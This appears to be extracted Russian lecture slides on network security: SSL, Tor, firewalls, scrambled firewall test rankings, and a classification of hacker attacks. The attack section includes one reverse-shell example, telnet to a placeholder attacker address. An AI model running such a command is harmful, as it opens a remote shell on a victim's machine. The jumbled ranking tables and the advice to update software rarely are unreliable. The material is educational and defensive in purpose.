Протокол SSL SSL (Secure Sockets Layer) - криптографический протокол, который обеспечивает установление безопасного соединения между клиентом и сервером. SSL поддерживает 3 типа аутентификации: • аутентификация обеих сторон (клиент — сервер), • аутентификация сервера с неаутентифицированным клиентом • полная анонимность. Протокол рукопожатия (handshake): 1) Клиент подключается к SSL серверу. Запрос безопасного соединения представляет собой список поддерживаемых клиентом шифров и хэш-функций. 2) Из этого списка сервер выбирает самый сильный шифр и хэш-функцию, которую он также поддерживает, и уведомляет клиентов о принятом решении. Сервер отсылает это решение в виде цифрового сертификата (имя сервера, доверенный Центр Сертификации, и открытый ключ шифрования сервера). 3) Клиент шифрует случайное число с помощью открытого ключа сервера и отправляет результат на сервер. Сервер своим закрытым ключом расшифровывает случайное число. 4) Из случайного числа обе стороны создают ключ сеанса. Алгоритмы, использующиеся в SSL • Для обмена ключами и проверки их подлинности применяются: RSA, Diffie-Hellman, ECDH, SRP, PSK. • Для аутентификации: RSA, DSA, ECDSA. • Для симметричного шифрования: RC2, RC4, IDEA, DES, Triple DES или AES, Camellia. • Для хеш-функций: SHA, MD5, MD4 и MD2. Tor (The Onion Router) —программное обеспечение для реализации «луковой маршрутизации», позволяющей обеспечить анонимное соединение в сети. Каждый пакет, попадающий в систему, проходит через три различных сервера (нода), которые выбираются случайным образом. Перед отправлением пакет последовательно шифруется тремя ключами: сначала для третьей ноды, потом для второй, и, в конце концов, для первой. Когда первая нода получает пакет, она расшифровывает «верхний» слой шифра (аналогия с тем, как чистят луковицу) и узнает, куда отправить пакет дальше. Второй и третий сервер поступают аналогичным образом. Особенности технологии TOR: • Первый узел цепочки знает настоящий адрес клиента; • Последний узел цепочки видит исходное сообщение от клиента, хотя и не знает истинного отправителя; • Сервер-адресат видит исходное сообщение от клиента, хотя и не знает истинного отправителя; • Все интернет-шлюзы на пути от последнего узла сети Tor до сервераадресата видят исходное сообщение от клиента, хотя и не знают адреса истинного отправителя. Но они знают адрес последнего нода. Соединение с сервером с помощью технологии TOR (З,К – пара закрытого и открытого ключей) Сервер Нод 2 (пара ключей З2, К2) Нод 3 (пара ключей З3, К3) Кодированное K3: Пакеты Один из серверов TOR Список возможных нодов Кодированное K2: Адрес K3, Кодированное K3: Пакеты кодированное ключем K1: Адрес K2, Кодированное K2: Адрес K3, Кодированное K3: Нод 1 (пара ключей З1, К1) Пакеты Пользователь Системы Firewall Firewall (межсетевой экран, брандмауэр) – программно-аппаратный комплекс, обеспечивающий защиту локальной компьютерной сети (или отдельной рабочей станции) от враждебной внешней среды и от несанкционированных действий при взаимодействии с внешними сетями. Firewall защищает от: 1) Угроз неправомерного вторжения во внутреннюю сеть из внешней; 2) Угроз несанкционированного доступа во внешнюю сеть из внутренней. Основные функции Firewall: 1) Фильтрация проходящих через него информационных потоков; 2) Посредничество при реализации межсетевых взаимодействий (например, обеспечение протокольного преобразования отличающихся по реализации уровней модели OSI для объединяемых сетей). Важные дополнительные функции: кэширование информации (прокси) и трансляция адресов. Стандартная схема использования Firewall Схема использования Firewall с демилитаризованной зоной (DMZ) Схема использования Firewall в частных виртуальных сетях (VPN) Результаты тестирования Firewall (26 тестов, 2007 год) N 1 Firewall Online Armor Personal Firewall Оценка Защита N Firewall Оценка Защита 9625 Превосходная 100% 33 Norman Personal Firewall 750 Никакая 34 TheGreenBow Personal Firewall 750 Никакая 9625 Превосходная 100% 35 Panda Antivirus + Firewall 2007 650 Никакая 36 AVG Anti-Virus plus Firewall 500 Никакая 37 Armor2net Personal Firewall 500 Никакая 38 Ashampoo FireWall Pro 500 Никакая 39 Filseclab Personal Firewall 500 Никакая 40 Rising Personal Firewall 2007 500 Никакая 41 Prisma Firewall 250 Никакая 42 Windows Firewall XP SP2 0 Отсутствует 2 Outpost Firewall Pro 2008 3 Comodo Firewall Pro 4 Jetico Personal Firewall 9375 Превосходная 5 ProSecurity 1.40 8875 Очень хорошая 6 ZoneAlarm Pro 8600 Очень хорошая 9475 Превосходная Lavasoft Personal Firewall 8500 Kaspersky Internet Security 8475 9 System Safety Monitor 7975 Очень хорошая 10 Jetico Personal Firewall Free 7750 Очень хорошая 7 8 Очень хорошая Очень хорошая Результаты тестирования Firewall (73 теста, 2008 год) N Firewall 1 Outpost Firewall Pro 2009 6.5 2 Online Armor Personal Firewall 2.1 Оценка Защита N 99% Превосходная 100% 11 98% Превосходная 100% 3 Comodo Firewall Pro 3.0 FREE 95% Превосходная 4 ProSecurity 1.43 93% Превосходная 5 Privatefirewall 6.0 90% Превосходная Оценка Защита Jetico Personal Firewall 2.0 78% Хорошая 12 System Safety Monitor 2.3 77% Хорошая 13 Norton Internet Security 2009 71% Хорошая 14 Lavasoft Personal Firewall 70% Хорошая 15 Dynamic Security Agent 2.0 62% Плохая 16 Webroot Desktop Firewall 5.5 60% Плохая Firewall Online Armor Personal Firewall 2.1 FREE 89% 7 Kaspersky Internet Security 2009 87% Очень хорошая 17 Comodo Firewall Pro 2.4 FREE 55% Плохая 8 Netchina S3 2008 FREE 86% Очень хорошая 18 Trend Micro Internet Security Pro 27% Никакая 9 ZoneAlarm Pro 2009 86% Очень хорошая 19 G DATA InternetSecurity 19% Никакая 10 PC Tools Firewall Plus 4.0 FREE 85% Очень хорошая 25 Avira Premium Security Suite 11% Никакая 6 Очень хорошая Результаты тестирования Firewall (86 тестов, 2009 год) N 1 Firewall Comodo Internet Security 3.12 FREE Оценка Защита N 100% Превосходная 100% 12 2 Online Armor Personal Firewall 3.5.0.14 99% Превосходная 3 PC Tools Firewall Plus 6.0 FREE 99% Превосходная 96% Превосходная 93% Превосходная Kaspersky 4 Internet Security 2010 Outpost Firewall 5 FREE 2009 Outpost Security 6 Suite Pro 2009 Online Armor 7 Personal Firewall 3.5.0.14 FREE Jetico Personal 8 Firewall 2.0.2.8 Malware 9 Defender 2.2.2 Privatefirewall 10 6.0.20.14 Netchina S3 2008 11 3.5.5.1 FREE 92% Превосходная 89% Очень хорошая 89% Очень хорошая 85% Защита ZoneAlarm Pro 72% Хорошая 13 Norton Internet Security 2010 67% Хорошая 14 Lavasoft Personal Firewall 67% Хорошая 15 Webroot Desktop Firewall 54% Плохая 16 Trend Micro Internet Security Pro 29% Никакая 17 BitDefender Internet Security 2009 12% Никакая 18 ZoneAlarm Free Firewall 8.0 11% Никакая 19 Avira Premium Security Suite 9.0 10% Никакая … … … … 34 Mamutu 1.7.0.23 2% Никакая Превосходная 92% 88% Оценка Очень хорошая Очень хорошая Firewall Результаты тестирования Firewall (142 тестов, 2010 год) N 1 2 3 Оценка Защита N 100% Превосходная 100% 12 Online Solutions Security Suite 1.5 99% Превосходная Outpost Security Suite Pro 7.0 97% Firewall Comodo Internet Security 4.0 FREE Kaspersky 4 Internet Security 2011 11.0 Malware 5 Defender 2.6 Privatefirewall 7.0 6 FREE Outpost Firewall 7 FREE 2009 ZoneAlarm 8 Extreme Security 9.1 Rising Internet 9 Security 2010 PC Tools Firewall 10 Plus 6.0 FREE Norton Internet 11 Security 2010 92% Защита Jetico Personal Firewall 2 28% Никакая 13 BitDefender Int. Security 2010 24% 14 Dr.Web Security Space Pro 6.0 14% 15 CA Internet Security Suite Plus 2010 12% Никакая 16 F-Secure Internet Security 2010 9% Никакая 17 Trend Micro Internet Security Pro 2010 9% Никакая 18 ZoneAlarm Free Firewall 9 FREE 7% Никакая Превосходная Превосходная 90% Очень хорошая 86% Очень хорошая 71% Хорошая 59% Оценка Плохая Firewall Никакая Никакая 55% Плохая 51% Плохая 19 Avira Premium Security Suite 10 3% Никакая 40% Очень плохая … 22 Panda Internet Security 2010 1% Никакая Результаты тестирования Firewall (148 тестов, 2011 год) N 1 Firewall Comodo Internet Security 5.3 FREE Оценка Защита N 100% Превосходная 100% 12 2 Online Solutions Security Suite 1.5 99% Превосходная 3 Privatefirewall 7.0 FREE 98% Превосходная 97% Превосходная 97% Превосходная 97% Превосходная 4 5 6 7 8 9 Outpost Security Suite FREE 7.0 Outpost Security Suite Pro 7.5 BitDefender Int. Security 2011 Kaspersky Internet Security 2012 12.0 Malware Defender 2.7 FREE PC Tools Internet Security 2011 8.0 Jetico Personal 10 Firewall 2.1 ZoneAlarm 11 Extreme Sec 2012 93% 91% Оценка Защита Rising Internet Security 2010 34% Очень плохая 13 CA Internet Security Suite Plus 2010 30% Очень плохая 14 Norton Internet Security 2010 20% Никакая 15 avast! Internet Security 6.0 15% Никакая 16 Dr.Web Security Space Pro 6.0 14% Никакая 17 F-Secure Internet Security 2011 9% Никакая … 20 ZoneAlarm Free Firewall 9.2 FREE 7% Никакая Превосходная Превосходная Firewall 90% Очень хорошая 88% Очень хорошая … 23 Avira Premium Security Suite 10 3% Никакая 72% Хорошая … 29 TrustPort Internet Security 2011 1% Никакая Результаты тестирования Firewall (104 теста, 2012 год, matousec.com) N 1 2 3 4 5 6 7 8 9 Firewall Comodo Internet Security 5.9 FREE Privatefirewall 7.0 FREE Kaspersky Internet Security 2012 13.0 Outpost Security Suite Pro 7.5.2 Outpost Security Suite FREE 7.1 VirusBuster Internet Security Suite 4.1 Jetico Personal Firewall 2.1 ESET Smart Security 5.2 ZoneAlarm Extreme Sec 2012 10 ZoneAlarm Free Antivirus + Firewall 11 Total Defense Internet Security Suite Оценка Защита 94% Превосходная 88% Очень хорошая 86% 86% 71% 71% N Защита avast! Internet Security 7.0 15% Никакая 13 Dr.Web Security Space 7.0 11% Никакая 14 Norton Internet Security 2012 10% Никакая 15 Avira Internet Security 2013 9% Никакая 16 Bitdefender Total Security 2013 9% Никакая 17 TrustPort Total Protection 2013 8% Никакая Очень хорошая Хорошая Оценка 12 Очень хорошая Хорошая Firewall 59% Плохая 51% Плохая 18 Norman Security Suite PRO 9.0 6% Никакая 43% Очень плохая 19 PC Tools Internet Security 2012 6% Никакая 34% Очень плохая … 35 AhnLab V3 Internet Security 8.0 2% Никакая 21% Никакая Результаты тестирования Firewall (110 тестов, 2013 год, matousec.com) N 1 2 3 4 5 6 7 8 9 Firewall Comodo Internet Security 6.3 FREE Outpost Security Suite Pro 8.0.4 Privatefirewall 7.0.29 FREE Kaspersky Internet Security 2013 13.0.1 SpyShelter Firewall 2.2 Outpost Security Suite FREE 7.1.1 VirusBuster Internet Security Suite 4.1 Jetico Personal Firewall 2.1 ESET Smart Security 6.0 Оценка Защита 97% Превосходная 90% Превосходная 88% N Firewall Оценка Защита 12 avast! Internet Security 8.0 32% Очень плохая Очень хорошая 13 Total Defense Internet Security Suite 8.0 31% Очень плохая 86% Очень хорошая 13 Dr.Web Security Space 8.2.1 24% Никакая 85% Очень хорошая 14 Webroot Secure Anywhere Complete 22% Никакая 71% Хорошая 15 eScan Internet Security Suite 14 14% Никакая Хорошая 16 K7 TotalSecurity 2013 9% Никакая 58% Плохая 17 Norton Internet Security 2012 9% Никакая 55% Плохая 19 Bitdefender Total Security 2013 8% Никакая 20 Avira Internet Security 2013 6% Никакая … 37 VIPRE Internet Security 2014 2% Никакая 71% 10 ZoneAlarm Extreme Sec 2013 34% Очень плохая 11 ZoneAlarm Free Antivirus + Firewall 34% Очень плохая Результаты тестирования Firewall (110 тестов, 2014 год, matousec.com) N 1 2 3 4 5 6 7 8 9 Firewall Comodo Internet Security Premium 7.0 FREE Outpost Security Suite Pro 9.1 Kaspersky Internet Security 2015 15.0.0 SpyShelter Firewall 9.2 Privatefirewall 7.0.30.3 FREE Outpost Security Suite FREE 7.1.1 VirusBuster Internet Security Suite 4.1 Jetico Personal Firewall 2.1 ESET Smart Security 7.0 Оценка Защита 97% Превосходная 90% Превосходная 89% 89% 88% 71% 71% 58% Очень хорошая Очень хорошая Очень хорошая Оценка Защита 12 Total Defense Internet Security Suite 9.0 30% Очень плохая 13 Dr.Web Security Space 9.0 24% Никакая 13 Webroot Secure Anywhere Complete 23% Никакая 14 Bitdefender Total Security 2014 19% Никакая 15 BullGuard Internet Security 2014 16% Никакая 16 eScan Internet Security Suite 14 14% Никакая 17 Avira Internet Security 2013 9% Никакая 18 K7 TotalSecurity 2013 9% Никакая N Хорошая Хорошая Плохая 55% Плохая Firewall 10 ZoneAlarm Extreme Sec 2013 34% Очень плохая 19 Norton Internet Security 2012 9% Никакая 11 ZoneAlarm Free Antivirus + Firewall 34% Очень плохая … 37 Zillya! Internet Security 1.1 2% Никакая Virusbtn.com – тест антивирусов (август 2011) Virusbtn.com – тест антивирусов (август 2012) Virusbtn.com – тест антивирусов (август 2013) Virusbtn.com – тест антивирусов (август 2014) Некоторые правила при работе с FIREWALL 1) Установите МАКСИМАЛЬНЫЙ уровень безопасности в настройках файервола. 2) Имейте ограниченное количество программ, для которых Вы разрешаете любую сетевую активность (Internet Explorer, Skype, ICQ, один из файловых менеджеров, например, Total Commander, какой-нибудь Torrent клиент, один из почтовых клиентов, например The Bat). Для остальных программ прямо запрещайте любую сетевую активность. 3) Пользуйтесь программами, которые хорошо знаете. Как можно реже обновляйте программы из основного списка (пункт 2), для которых разрешена сетевая активность. Для остальных программ (особенно новых устанавливаемых) в исключительных случаях разрешайте ОДНОКРАТНУЮ сетевую активность только при онлайн-регистрации программы при ее установке. 4) Помните, что доверяя файерволу, Вы ДОВЕРЯЕТЕ НЕИЗВЕСТНОЙ ВАМ КОМАНДЕ ПРОФЕССИОНАЛОВ. Не доверяйте файерволу защиту персональной информации (кредитные карты, пароли доступа и пр.). Храните такую информацию на изолированных от Интернета и локальных сетей компьютерах или на бумажных носителях информации. Классификация хакерских атак: 1. Fishing (или Фишинг). Очень широкое понятие. Смысл его в том, чтобы получить от пользователей информацию (пароли, номера кредитных карт и т.п.) или деньги. Этот приём направлен не на одного пользователя, а на многих. Например, письма якобы от службы технической поддержки рассылаются всем известным клиентам какого-либо банка. В письмах обычно содержится просьба выслать пароль к учётной записи, якобы из-за проведения каких-либо технических работ. Несмотря на то, что пользователей предупреждают, что никакую подобную информацию от них никто из работников не может потребовать, и эта информация не должна разглашаться, всегда находятся те, кто с удовольствием «дарит» свои номера, пароли и прочее. Подобные письма, обычно очень правдоподобно и грамотно составлены, что, возможно, подкупает доверчивых пользователей. Нужно оговориться, что приёмов для фишинга есть несколько, помимо писем. Рекомендации: Помните, что паранойя – лучшая защита. Не доверяйте ничему подозрительному, никому не давайте свои данные. Администраторам не нужно знать Ваш пароль, если он предназначен для доступа к их серверу. Они полностью управляют сервером и могут сами посмотреть пароль или изменить его Классификация хакерских атак: 2. Социальная инженерия – это не технический, а психологический приём. Пользуясь данными, полученными при инвентаризации, взломщик может позвонить какому-либо пользователю (например, корпоративной сети) от имени администратора и попытаться узнать у него, например, пароль. Это становится возможным, когда в больших сетях, пользователи не знают всех работников, и тем более не всегда могут точно узнать их по телефону. Кроме этого, используются сложные психологические приёмы, поэтому шанс на успех сильно возрастает. Рекомендации: те же самые. Если действительно есть необходимость, то сообщите нужные данные лично. В том случае, если Вы записали пароль на бумаге, не оставляйте её где попало и по возможности уничтожайте, а не просто выбрасывайте в мусорную корзину. 3. DoS (Denial of Service или Отказ от Обслуживания). Это скорее не отдельная атака, а результат атаки; используется для вывода системы или отдельных программ из строя. Для этого взломщик особым образом формирует запрос к какой-либо программе, после чего она перестаёт функционировать. Требуется перезарузка, чтобы вернуть рабочее состояние программы. Часто встречается мнение, что DoS, это то же самое, что и атака типа Flood и что вообще нужно соединить все атаки, которые приводят к отказу системы под общим названием DoS. Классификация хакерских атак: 4. Flood (Флуд или Поток/Затопление). С некоторого количества машин (в этом случае атака будет называться DDoS Distributed Denial of Service. Распределенная атака на отказ от обслуживания), как правило «Зомби» посылают жертве максимально возможное количество запросов (например, запросы на соединение). От этого жертва не успевает отвечать на каждый запрос, и в итоге не отвечает на пользовательские запросы. Разновидности: --SYN Flood – Затопление атакуемого компьютера пакетами типа SYN. Как известно, компьютер должен на такой пакет ответить пакетом типа SYN/ACK. Если пакетов SYN слишком много, то компьютер не успевает отвечать на каждый и не может принимать пакеты от других компьютеров. --ICMP Flood или Ping Flood – То же самое, только пакетами ICMP. Система должна ответить на такой пакет, тем самым создаётся большое количество пакетов, которые снижают производительность (пропускную способность) канала. --Identification Flood (Ident Flood). Похожа на ICMP Flood, но ответ на запрос на порт 113 типа identd занимает у системы больше времени, поэтому атака более эффективна. --DNS Flood – атака направлена на DNS сервера. Их наводняют DNS запросы, на которые сервер не успевает отвечать, таким образом, на Ваши запросы он так же ответить не сможет. Как следствие, Вы не сможет посещать Интернет сайты. --DDoS DNS – Адрес, по которому должен ответить DNS-сервер на эти запросы, равен адресу самого DNS сервера, т.е. его не только наводняют запросы DNS, но он же ещё и отправляет их себе же. --Boink (Bonk, Teardrop) – Жертве посылается огромное количество сильно фрагментированных пакетов, но при этом фрагменты большого размера. 5. --Pong – то же самое, что и любой другой из вышеперечисленных видов, отличие только в том, что адрес отправителя поддельный. Классификация хакерских атак: 5. Smurf (атака, направленная на ошибки реализации TCP-IP протокола). Сейчас этот вид атаки считается экзотикой, однако раньше, когда TCP-IP протокол был достаточно новым, в нём содержалось некоторое количество ошибок, которые позволяли, например, подменять IP адреса. Однако, этот тип атаки применяется до сих пор. Некоторые специалисты выделяют TCP Smurf, UDP Smurf, ICMP Smurf. Конечно, такое деление основано на типе пакетов. 6. Ping-of-Death (или Jolt, SSPing) – Атака заключается в том, что жертве посылается фрагментированный ICMP пакет, но размер фрагмента очень большой (64кБ). Старые версии ОС, например Windows 95, повисают. Эту атаку можно осуществить с помощью программы Shadow Security Scanner. 7. UDP Storm (UDP шторм) – используется в том случае, если на жертве открыто как минимум два UDP порта, каждый из которых отсылает отправителю какой-нибудь ответ. Например, порт 37 с сервером time на запрос отправляет текущую дату и время. Взломщик отправляет UDP пакет на один из портов жертвы, но в качестве отправителя указывает адрес жертвы и второй открытый UDP порт жертвы. Тогда порты начинают бесконечно отвечать друг другу, что снижает производительность. Шторм прекратится, как только один из пакетов пропадёт (например, из-за перегрузки ресурсов). Классификация хакерских атак: 8. UDP Bomb – взломщик отправляет системе UDP пакет с некорректными полями служебных данных. Данные могут быть нарушены как угодно (например, некорректная длина полей, структура). Это может привести к аварийному завершению. 9. Land – жертве посылается пакет на определённый порт, но адрес отправителя устанавливается тот же самый, что и жертвы, а порт отправителя равен порту получателя. (пример: получатель: 1.1.1.1 порт 111 отправитель: 1.1.1.1 порт 111). Жертва пытается установить соединение с собой, отчего может произойти повисание системы. Подобная атака также может быть на 100% эффективна против некоторых маршрутизаторов. 10. Mail Bombing («Почтовая бомбёжка»). Если на атакуемом компьютере есть почтовый сервер, то на него посылается огромное количество почтовых сообщений с целью вывода его из строя. 11. Sniffing (Сниффинг или прослушивание сети). В том случае, если вместо коммутаторов в сети установлены концентраторы, полученные пакеты рассылаются всем компьютерам в сети, а дальше уже компьютеры определяют для них этот пакет или нет. Если взломщик получит доступ к компьютеру, который включен в такую сеть, или получит доступ к сети непосредственно, то вся информация, передаваемая в переделах сегмента сети, включая пароли, станет доступна. Взломщик просто поставит сетевую карту в режим прослушивания и будет принимать все пакеты независимо от того, ему ли они предназначались. Классификация хакерских атак: 12. IP Hijack (IP хайджек). Если есть физический доступ к сети, то взломщик может «врезаться» в сетевой кабель и выступить в качестве посредника при передаче пакетов, тем самым он будет слушать весь трафик между двумя компьютерами. 13. Dummy ARP (Ложный ARP). ARP сервер, маршрутизатор или коммутатор знают какие IP принадлежат MAC адресам (т.е. сетевым картам). При возможности физического доступа к сети, взломщик может подделать ARP ответ и выдать себя за другой компьютер в сети, получив его IP. 14. Dummy DNS Server (ложный DNS Сервер). Если настройки сети поставлены в автоматический режим, то при включении в сеть, компьютер «спрашивает» (т.е. отправляет широковещательный пакет) кто будет его DNS сервером, к которому он в дальнейшем будет отправлять DNS запросы. При наличии физического доступа к сети, взломщик может перехватить такой широковещательный запрос и ответить, что его компьютер будет DNS сервером. 15. Fuzzy (Фаззи). Фильтры могут быть настроены на блокировку определённых видов пакетов, например UDP. Взломщик может сфабриковать пакет так, что фильтр не поймет, что этот пакет UDP и не отфильтрует его, и он попадёт по назначению. Классификация хакерских атак: 16. Puke – взломщик фабрикует ответ ICMP unreachable (ошибка удалённой системы), что спровоцирует клиента на отключение от сервера. Используется скорее как вспомогательное средство, в том случае, если какой-либо клиент должен быть отключён от сервера для проведения атаки. 17. Fake unreachable – взломщик фабрикует сообщение о том, что пакет не может быть доставлен (unreachable), тем самым заставляет сервер думать, что у клиента сбой и пакеты не доставляются по назначению. Это может спровоцировать сервер отключить клиента. Тоже вспомогательное средство, похоже на №17, только направлен не на клиента, а на сервер. 18. Back Connect/Pipes/Reverse (Обратный сеанс или Реверс) - взломщик вынуждает атакуемый компьютер подключиться к компьютеру взломщика. Например на атакуемом компьютере можно выполнить команду telnet [ip.адрес.взломщика] [порт]. После этого взломщик, по сути дела получает командную строку (командную оболочку или Шелл/Shell) на атакуемом компьютере. 19. Shatter - Уязвимость Windows систем, которая может быть использована только локально. Основана на том, что у каждого окна в Windows, у которого есть поле для ввода, есть и максимальная длина вводимого значения. Переполнение этой строки приводит к попаданию определенного кода в стек и выполнению его процессором. 20. IP-Spoofing (Спуфинг или Подмена IP адреса). 21. Host spoofing (Подмена хоста). Классификация хакерских атак: 22. Software vulnerabilities (Ошибки ПО). 23. Buffer Overflow (Переполнение буфера). 24. Nuke (WinNuke или Нюк) – устаревшая атака (несовершенство NetBIOS). 25. Cross User Attack (межпользовательская атака) – Основана на несовершенстве протокола TCP (фальсификация одним пользователем информации для другого пользователя). 26. Атака на CGI – получение доступа к содержимому серверов и модификация кода серверной части сайтов. Основана на возможностях языков программирования PERL, PHP, небрежном программировании серверных приложений на этих языках. 27. SQL Injection (SQL инъекция) – взлом SQL баз данных с помощью специальных запросов. Возможна при небрежном программировании и настройке SQL или mySQL. 28. HRS (HTTP Resource Splitting) – похищение cookie, фальсификация сервиса. 29. Cross User Defacement – фальсификация сервиса. 30. Hijacking Pages – сервер посылает HTML страницу, предназначенную для одного пользователя, другому пользователю (хакеру). 31. CSS/XSS (Cross-Site Scripting) – похищение cookie. 32. NULL Byte (или Нулевой байт) – атака на PERL. 33. Include Bug. PHP-Include Bug – атаки на PHP.